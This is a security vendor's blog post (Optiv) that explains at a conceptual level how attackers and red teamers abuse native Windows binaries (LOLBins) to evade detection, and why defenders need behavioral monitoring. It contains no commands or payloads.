Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
November 16, 2023
Over the years, the security scene has been characterized by a cat-and-mouse game between red teamers and blue teamers. Increasingly sophisticated attack techniques have led to an equally sophisticated response in terms of endpoint detection and response (EDR) systems, endpoint protection platforms (EPPs) and antivirus software.
Due to this evolution, red teamers need to step up their game to get the edge on the blue team, to match the sophistication of real-world adversaries and, in general, to stay relevant. They need to get quieter so they can get their activity to blend in with legitimate network traffic.
One ideal way to stay quiet is to use native binaries from within the operating system, also known as LOLBins (living off the land binaries). Red teamers can leverage some of the functionalities of these binaries, which are often trusted by known vendors. This blog post will further explain the significance of LOLBins attacks.
LOLBins derive from the idea of “living off the land,” which means compromising a system using only the tools from within the operating system itself. Applying this concept to their techniques, adversaries and red teamers can keep a low profile because they don’t install new tools or create new files that could leave a revealing audit trail. Instead, they can use these functionalities of native binaries beyond their intended use. When leveraging LOLBins binaries, adversaries can even execute attacks without escalating privileges to an administrator level.
Because they are difficult to detect or distinguish from legitimate network traffic, LOLBins pose a challenge to blue teamers. In fact, blue teamers don’t always actively monitor them, or they only track the most well-known ones. Unfortunately, Windows OS comes with a lot of native binaries, and they are not always documented. So, detecting a new LOLBin can be like finding a zero-day—at least for a while.
In an important effort to document and traffic new LOLBins, the security community is producing the LOLBAS project. By documenting both the discovered offensive capabilities and the related TTPs (Tactics, Techniques and Procedures), this project provides crucial reference material for red teamers and blue teamers. Using these references from the LOLBAS project and the MITRE ATT&CK framework, organizations can more deeply analyze any security gaps and provide a more thorough assessment of security solutions.
The concept behind LOLBins represents a dramatic shift in the security game. As seen in recent examples, APT (advanced persistent threats) and other malicious actors have been increasingly using native binaries to avoid detection and deliver malware and ransomware campaigns. If this opens interesting avenues for red teamers, then it also makes blue teamers’ jobs harder.
These industry shifts add more fodder to the argument that organizations should view security more as a mindset than a product. Security breaches can often happen because organizations overly rely on off-the-shelf solutions, thinking that such products might give them complete visibility into what happens within their network.
If organizations do not account for the possibility of attackers abusing LOLBins to achieve their goals and compromise their system, this creates blind spots in corporate networks that often allow attackers to go undetected for long amounts of time.
Because these native binaries are signed by known vendors and derive from within the operating system itself, LOLBins challenge traditional endpoint detection and response (EDR) solutions in terms of pure detection. This is because LOLBins are not associated with malware signatures, and they look legitimate. But more recently, most EDR solutions have started including behavioral factors (e.g., asking why someone in the accounting department needs the ability to RDP to the domain controller). In the effort to approach security with this zero-trust mindset, security practitioners should invest time and resources to research new potential LOLBins. Equipped with this information, security teams proactively implement appropriate defenses and monitoring capabilities accordingly.
Here are some key takeaways that you should keep in mind when it comes to LOLBins.
Optiv Security: Secure greatness.®
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
August 25, 2023
Adversaries can utilize native tools to remain undetected by defenders. See our demo of how red and blue teamers can enhance engagements with LOLBins.
June 14, 2023
Spear phishing is a social engineering activity intended to simulate a realistic attack scenario with the intent of bypassing technical security....
The Source Zero Con video hub features virtual presentations and interactive workshops led by Optiv’s community of technical cybersecurity experts.
Let us know what you need, and we will have an Optiv professional contact you shortly.